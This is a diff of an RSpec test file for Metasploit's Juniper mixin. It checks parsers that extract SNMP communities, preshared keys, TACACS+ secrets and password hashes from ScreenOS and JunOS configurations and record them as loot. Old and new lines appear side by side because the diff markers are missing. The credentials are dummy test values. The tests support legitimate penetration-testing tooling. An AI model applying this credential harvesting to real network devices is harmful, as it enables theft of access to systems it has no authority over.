workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: 'snmp',
|
||||
module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
|
||||
private_data: "sales",
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
private_data: 'sales',
|
||||
private_type: :password,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED,
|
||||
access_level: 'RO'
|
||||
}
|
||||
)
|
||||
aux_juniper.juniper_screenos_config_eater('127.0.0.1',1337,'set snmp community "sales" Read-Only Trap-on traffic version v1')
|
||||
aux_juniper.juniper_screenos_config_eater('127.0.0.1', 1337, 'set snmp community "sales" Read-Only Trap-on traffic version v1')
|
||||
end
|
||||
|
||||
it 'with Read-Write permission' do
|
||||
expect(aux_juniper).to receive(:print_good).with('SNMP community sales with permissions Read-Write')
|
||||
expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: "127.0.0.1",
|
||||
address: '127.0.0.1',
|
||||
port: 161,
|
||||
protocol: "udp",
|
||||
protocol: 'udp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: 'snmp',
|
||||
module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
|
||||
private_data: "sales",
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
private_data: 'sales',
|
||||
private_type: :password,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED,
|
||||
access_level: 'RW'
|
||||
}
|
||||
)
|
||||
aux_juniper.juniper_screenos_config_eater('127.0.0.1',1337,'set snmp community "sales" Read-Write Trap-on traffic version v1')
|
||||
aux_juniper.juniper_screenos_config_eater('127.0.0.1', 1337, 'set snmp community "sales" Read-Write Trap-on traffic version v1')
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
it 'deals with ppp configurations' do
|
||||
expect(aux_juniper).to receive(:print_good).with('PPTP Profile ISP with username username hash fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA== via pap')
|
||||
expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
|
||||
expect(aux_juniper).to receive(:store_loot).with(
|
||||
"juniper.netscreen.config", "text/plain", "127.0.0.1",
|
||||
"setppp profile \"ISP\" auth type pap\n" <<
|
||||
"setppp profile \"ISP\" auth local-name \"username\"\n" <<
|
||||
"setppp profile \"ISP\" auth secret \"fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA==\"",
|
||||
"config.txt", "Juniper Netscreen Configuration"
|
||||
'juniper.netscreen.config', 'text/plain', '127.0.0.1',
|
||||
"setppp profile \"ISP\" auth type pap\n" <<
|
||||
"setppp profile \"ISP\" auth local-name \"username\"\n" <<
|
||||
'setppp profile "ISP" auth secret "fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA=="',
|
||||
'config.txt', 'Juniper Netscreen Configuration'
|
||||
)
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: "127.0.0.1",
|
||||
address: '127.0.0.1',
|
||||
port: 1723,
|
||||
protocol: "tcp",
|
||||
protocol: 'tcp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: 'pptp',
|
||||
module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
|
||||
username: "username",
|
||||
private_data: "fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA==",
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
username: 'username',
|
||||
private_data: 'fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA==',
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
aux_juniper.juniper_screenos_config_eater('127.0.0.1',1337,
|
||||
"setppp profile \"ISP\" auth type pap\n" <<
|
||||
"setppp profile \"ISP\" auth local-name \"username\"\n" <<
|
||||
"setppp profile \"ISP\" auth secret \"fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA==\"\n"
|
||||
)
|
||||
aux_juniper.juniper_screenos_config_eater('127.0.0.1', 1337,
|
||||
"setppp profile \"ISP\" auth type pap\n" <<
|
||||
"setppp profile \"ISP\" auth local-name \"username\"\n" <<
|
||||
"setppp profile \"ISP\" auth secret \"fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA==\"\n")
|
||||
end
|
||||
|
||||
it 'deals with ike configurations' do
|
||||
expect(aux_juniper).to receive(:print_good).with('IKE Profile To-Cisco to 2.2.2.1 with password netscreen via pre-g2-des-sha')
|
||||
expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
|
||||
expect(aux_juniper).to receive(:store_loot).with(
|
||||
"juniper.netscreen.config", "text/plain", "127.0.0.1",
|
||||
"set ike gateway \"To-Cisco\" address 2.2.2.1 Main outgoing-interface \"ethernet1\" preshare \"netscreen\" proposal \"pre-g2-des-sha\"",
|
||||
"config.txt", "Juniper Netscreen Configuration"
|
||||
'juniper.netscreen.config', 'text/plain', '127.0.0.1',
|
||||
'set ike gateway "To-Cisco" address 2.2.2.1 Main outgoing-interface "ethernet1" preshare "netscreen" proposal "pre-g2-des-sha"',
|
||||
'config.txt', 'Juniper Netscreen Configuration'
|
||||
)
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: "2.2.2.1",
|
||||
address: '2.2.2.1',
|
||||
port: 500,
|
||||
protocol: "udp",
|
||||
protocol: 'udp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: 'ike',
|
||||
module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
|
||||
private_data: "netscreen",
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
private_data: 'netscreen',
|
||||
private_type: :password,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
aux_juniper.juniper_screenos_config_eater('127.0.0.1',1337,'set ike gateway "To-Cisco" address 2.2.2.1 Main outgoing-interface "ethernet1" preshare "netscreen" proposal "pre-g2-des-sha"')
|
||||
aux_juniper.juniper_screenos_config_eater('127.0.0.1', 1337, 'set ike gateway "To-Cisco" address 2.2.2.1 Main outgoing-interface "ethernet1" preshare "netscreen" proposal "pre-g2-des-sha"')
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
context '#juniper_junos_config_eater' do
|
||||
@@ -248,63 +247,135 @@ RSpec.describe Msf::Auxiliary::Juniper do
|
||||
|
||||
it 'deals with root credentials' do
|
||||
expect(aux_juniper).to receive(:print_good).with('root password hash: $1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E.')
|
||||
expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
|
||||
#expect(aux_juniper).to receive(:store_loot).with(
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
|
||||
# expect(aux_juniper).to receive(:store_loot).with(
|
||||
# "juniper.netscreen.config", "text/plain", "127.0.0.1", "enable password 1511021F0725", "config.txt", "Cisco IOS Configuration"
|
||||
#)
|
||||
# )
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: "127.0.0.1",
|
||||
address: '127.0.0.1',
|
||||
port: 161,
|
||||
protocol: "tcp",
|
||||
protocol: 'tcp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: '',
|
||||
module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
|
||||
username: "root",
|
||||
private_data: "$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E.",
|
||||
jtr_format: "md5",
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
username: 'root',
|
||||
private_data: '$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E.',
|
||||
jtr_format: 'md5',
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1',161,
|
||||
%q(system {
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1', 161,
|
||||
%q(system {
|
||||
root-authentication {
|
||||
encrypted-password "$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E."; ## SECRET-DATA
|
||||
}
|
||||
}
|
||||
)
|
||||
)
|
||||
))
|
||||
end
|
||||
|
||||
context 'deals with user account with password hash' do
|
||||
it 'with super-user' do
|
||||
expect(aux_juniper).to receive(:print_good).with('User 2000 named newuser in group super-user found with password hash $1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/.')
|
||||
expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
|
||||
expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
|
||||
"system {\n login {\n user newuser {\n uid 2000;\n class super-user;\n authentication {\n encrypted-password \"$1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/\"; ## SECRET-DATA\n }\n }\n }\n }",
|
||||
"config.txt", "Juniper JunOS Configuration"
|
||||
)
|
||||
context 'deals tacplus-server blocks' do
|
||||
it 'with one cred' do
|
||||
expect(aux_juniper).to receive(:print_good).with('tacplus server 1.1.1.1 with password hash $9$aaAAAAAeAA1AAAb2AAjAqmAA')
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
|
||||
expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
|
||||
"tacplus-server {\n 1.1.1.1 secret \"$9$aaAAAAAeAA1AAAb2AAjAqmAA\"; ## SECRET-DATA\n }",
|
||||
'config.txt', 'Juniper JunOS Configuration')
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: "127.0.0.1",
|
||||
address: '127.0.0.1',
|
||||
port: 1337,
|
||||
protocol: "tcp",
|
||||
protocol: 'tcp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: '',
|
||||
module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
|
||||
username: "newuser",
|
||||
jtr_format: "md5",
|
||||
private_data: "$1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/",
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
jtr_format: '',
|
||||
private_data: '$9$aaAAAAAeAA1AAAb2AAjAqmAA',
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
|
||||
%q(system {
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
|
||||
%q(tacplus-server {
|
||||
1.1.1.1 secret "$9$aaAAAAAeAA1AAAb2AAjAqmAA"; ## SECRET-DATA
|
||||
}))
|
||||
end
|
||||
it 'with two cred' do
|
||||
expect(aux_juniper).to receive(:print_good).with('tacplus server 1.1.1.1 with password hash $9$aaAAAAAeAA1AAAb2AAjAqmAA')
|
||||
expect(aux_juniper).to receive(:print_good).with('tacplus server 2.2.2.2 with password hash $9$aaaAa/1aAAAa1aaaAAaa11aAA')
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
|
||||
expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
|
||||
"tacplus-server {\n 1.1.1.1 secret \"$9$aaAAAAAeAA1AAAb2AAjAqmAA\"; ## SECRET-DATA\n 2.2.2.2 secret \"$9$aaaAa/1aAAAa1aaaAAaa11aAA\"; ## SECRET-DATA\n }",
|
||||
'config.txt', 'Juniper JunOS Configuration')
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: '127.0.0.1',
|
||||
port: 1337,
|
||||
protocol: 'tcp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: '',
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
private_data: '$9$aaAAAAAeAA1AAAb2AAjAqmAA',
|
||||
jtr_format: '',
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: '127.0.0.1',
|
||||
port: 1337,
|
||||
protocol: 'tcp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: '',
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
private_data: '$9$aaaAa/1aAAAa1aaaAAaa11aAA',
|
||||
jtr_format: '',
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
|
||||
%q(tacplus-server {
|
||||
1.1.1.1 secret "$9$aaAAAAAeAA1AAAb2AAjAqmAA"; ## SECRET-DATA
|
||||
2.2.2.2 secret "$9$aaaAa/1aAAAa1aaaAAaa11aAA"; ## SECRET-DATA
|
||||
}))
|
||||
end
|
||||
end
|
||||
context 'deals with user account with password hash' do
|
||||
it 'with super-user' do
|
||||
expect(aux_juniper).to receive(:print_good).with('User 2000 named newuser in group super-user found with password hash $1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/.')
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
|
||||
expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
|
||||
"system {\n login {\n user newuser {\n uid 2000;\n class super-user;\n authentication {\n encrypted-password \"$1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/\"; ## SECRET-DATA\n }\n }\n }\n }",
|
||||
'config.txt', 'Juniper JunOS Configuration')
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: '127.0.0.1',
|
||||
port: 1337,
|
||||
protocol: 'tcp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: '',
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
username: 'newuser',
|
||||
jtr_format: 'md5',
|
||||
private_data: '$1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/',
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
|
||||
%q(system {
|
||||
login {
|
||||
user newuser {
|
||||
uid 2000;
|
||||
@@ -315,36 +386,34 @@ RSpec.describe Msf::Auxiliary::Juniper do
|
||||
}
|
||||
}
|
||||
}
|
||||
)
|
||||
)
|
||||
))
|
||||
end
|
||||
|
||||
it 'with operator' do
|
||||
expect(aux_juniper).to receive(:print_good).with('User 2002 named newuser2 in group operator found with password hash $1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0.')
|
||||
expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
|
||||
expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
|
||||
"system {\n login {\n user newuser2 {\n uid 2002;\n class operator;\n authentication {\n encrypted-password \"$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0\"; ## SECRET-DATA\n }\n }\n }\n }",
|
||||
"config.txt", "Juniper JunOS Configuration"
|
||||
)
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
|
||||
expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
|
||||
"system {\n login {\n user newuser2 {\n uid 2002;\n class operator;\n authentication {\n encrypted-password \"$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0\"; ## SECRET-DATA\n }\n }\n }\n }",
|
||||
'config.txt', 'Juniper JunOS Configuration')
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: "127.0.0.1",
|
||||
address: '127.0.0.1',
|
||||
port: 1337,
|
||||
protocol: "tcp",
|
||||
protocol: 'tcp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: '',
|
||||
module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
|
||||
username: "newuser2",
|
||||
jtr_format: "md5",
|
||||
private_data: "$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0",
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
username: 'newuser2',
|
||||
jtr_format: 'md5',
|
||||
private_data: '$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0',
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
|
||||
%q(system {
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
|
||||
%q(system {
|
||||
login {
|
||||
user newuser2 {
|
||||
uid 2002;
|
||||
@@ -355,36 +424,73 @@ RSpec.describe Msf::Auxiliary::Juniper do
|
||||
}
|
||||
}
|
||||
}
|
||||
)
|
||||
)
|
||||
))
|
||||
end
|
||||
|
||||
it 'with read-only' do
|
||||
expect(aux_juniper).to receive(:print_good).with('User 2003 named newuser3 in group read-only found with password hash $1$1.YvKzUY$dcAj99KngGhFZTpxGjA93..')
|
||||
expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
|
||||
expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
|
||||
"system {\n login {\n user newuser3 {\n uid 2003;\n class read-only;\n authentication {\n encrypted-password \"$1$1.YvKzUY$dcAj99KngGhFZTpxGjA93.\"; ## SECRET-DATA\n }\n }\n }\n }",
|
||||
"config.txt", "Juniper JunOS Configuration"
|
||||
)
|
||||
it 'with a full-name and custom class' do
|
||||
expect(aux_juniper).to receive(:print_good).with('User 2002 named newuser2 in group EXAMPLE found with password hash $1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0.')
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
|
||||
expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
|
||||
"system {\n login {\n user newuser2 {\n full-name \"test\";\n uid 2002;\n class EXAMPLE;\n authentication {\n encrypted-password \"$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0\"; ## SECRET-DATA\n }\n }\n }\n }",
|
||||
'config.txt', 'Juniper JunOS Configuration')
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: "127.0.0.1",
|
||||
address: '127.0.0.1',
|
||||
port: 1337,
|
||||
protocol: "tcp",
|
||||
protocol: 'tcp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: '',
|
||||
module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
|
||||
username: "newuser3",
|
||||
jtr_format: "md5",
|
||||
private_data: "$1$1.YvKzUY$dcAj99KngGhFZTpxGjA93.",
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
username: 'newuser2',
|
||||
jtr_format: 'md5',
|
||||
private_data: '$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0',
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
|
||||
%q(system {
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
|
||||
%q(system {
|
||||
login {
|
||||
user newuser2 {
|
||||
full-name "test";
|
||||
uid 2002;
|
||||
class EXAMPLE;
|
||||
authentication {
|
||||
encrypted-password "$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0"; ## SECRET-DATA
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
it 'with read-only' do
|
||||
expect(aux_juniper).to receive(:print_good).with('User 2003 named newuser3 in group read-only found with password hash $1$1.YvKzUY$dcAj99KngGhFZTpxGjA93..')
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
|
||||
expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
|
||||
"system {\n login {\n user newuser3 {\n uid 2003;\n class read-only;\n authentication {\n encrypted-password \"$1$1.YvKzUY$dcAj99KngGhFZTpxGjA93.\"; ## SECRET-DATA\n }\n }\n }\n }",
|
||||
'config.txt', 'Juniper JunOS Configuration')
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: '127.0.0.1',
|
||||
port: 1337,
|
||||
protocol: 'tcp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: '',
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
username: 'newuser3',
|
||||
jtr_format: 'md5',
|
||||
private_data: '$1$1.YvKzUY$dcAj99KngGhFZTpxGjA93.',
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
|
||||
%q(system {
|
||||
login {
|
||||
user newuser3 {
|
||||
uid 2003;
|
||||
@@ -395,36 +501,34 @@ RSpec.describe Msf::Auxiliary::Juniper do
|
||||
}
|
||||
}
|
||||
}
|
||||
)
|
||||
)
|
||||
))
|
||||
end
|
||||
|
||||
it 'with unauthorized' do
|
||||
expect(aux_juniper).to receive(:print_good).with('User 2004 named newuser4 in group unauthorized found with password hash $1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/.')
|
||||
expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
|
||||
expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
|
||||
"system {\n login {\n user newuser4 {\n uid 2004;\n class unauthorized;\n authentication {\n encrypted-password \"$1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/\"; ## SECRET-DATA\n }\n }\n }\n }",
|
||||
"config.txt", "Juniper JunOS Configuration"
|
||||
)
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
|
||||
expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
|
||||
"system {\n login {\n user newuser4 {\n uid 2004;\n class unauthorized;\n authentication {\n encrypted-password \"$1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/\"; ## SECRET-DATA\n }\n }\n }\n }",
|
||||
'config.txt', 'Juniper JunOS Configuration')
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: "127.0.0.1",
|
||||
address: '127.0.0.1',
|
||||
port: 1337,
|
||||
protocol: "tcp",
|
||||
protocol: 'tcp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: '',
|
||||
module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
|
||||
username: "newuser4",
|
||||
jtr_format: "md5",
|
||||
private_data: "$1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/",
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
username: 'newuser4',
|
||||
jtr_format: 'md5',
|
||||
private_data: '$1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/',
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
|
||||
%q(system {
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
|
||||
%q(system {
|
||||
login {
|
||||
user newuser4 {
|
||||
uid 2004;
|
||||
@@ -435,160 +539,221 @@ RSpec.describe Msf::Auxiliary::Juniper do
|
||||
}
|
||||
}
|
||||
}
|
||||
)
|
||||
)
|
||||
))
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
context 'deals with snmp-server community' do
|
||||
|
||||
it 'with Read permissions' do
|
||||
expect(aux_juniper).to receive(:print_good).with('SNMP community read with permissions read-only')
|
||||
expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: "127.0.0.1",
|
||||
address: '127.0.0.1',
|
||||
port: 161,
|
||||
protocol: "udp",
|
||||
protocol: 'udp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: 'snmp',
|
||||
module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
|
||||
private_data: "read",
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
private_data: 'read',
|
||||
private_type: :password,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED,
|
||||
access_level: 'RO'
|
||||
}
|
||||
)
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
|
||||
%q(snmp {
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
|
||||
%q(snmp {
|
||||
community read {
|
||||
authorization read-only;
|
||||
}
|
||||
}
|
||||
)
|
||||
)
|
||||
))
|
||||
end
|
||||
|
||||
it 'with Read-Write permissions and view' do
|
||||
expect(aux_juniper).to receive(:print_good).with('SNMP community write with permissions read-write')
|
||||
expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: "127.0.0.1",
|
||||
address: '127.0.0.1',
|
||||
port: 161,
|
||||
protocol: "udp",
|
||||
protocol: 'udp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: 'snmp',
|
||||
module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
|
||||
private_data: "write",
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
private_data: 'write',
|
||||
private_type: :password,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED,
|
||||
access_level: 'RW'
|
||||
}
|
||||
)
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
|
||||
%q(snmp {
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
|
||||
%q(snmp {
|
||||
community write {
|
||||
view jweb-view-all;
|
||||
authorization read-write;
|
||||
}
|
||||
}
|
||||
)
|
||||
)
|
||||
))
|
||||
end
|
||||
|
||||
it 'with a space in the community string' do
|
||||
expect(aux_juniper).to receive(:print_good).with('SNMP community hello there with permissions read-write')
|
||||
expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: "127.0.0.1",
|
||||
address: '127.0.0.1',
|
||||
port: 161,
|
||||
protocol: "udp",
|
||||
protocol: 'udp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: 'snmp',
|
||||
module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
|
||||
private_data: "hello there",
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
private_data: 'hello there',
|
||||
private_type: :password,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED,
|
||||
access_level: 'RW'
|
||||
}
|
||||
)
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
|
||||
%q(snmp {
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
|
||||
%q(snmp {
|
||||
community "hello there" {
|
||||
authorization read-write;
|
||||
}
|
||||
}
|
||||
)
|
||||
)
|
||||
))
|
||||
end
|
||||
|
||||
|
||||
it 'with special characters in the community string' do
|
||||
expect(aux_juniper).to receive(:print_good).with('SNMP community aAa321$+!AaAaaa with permissions read-only')
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: '127.0.0.1',
|
||||
port: 161,
|
||||
protocol: 'udp',
|
||||
workspace_id: workspace.id,
|
||||
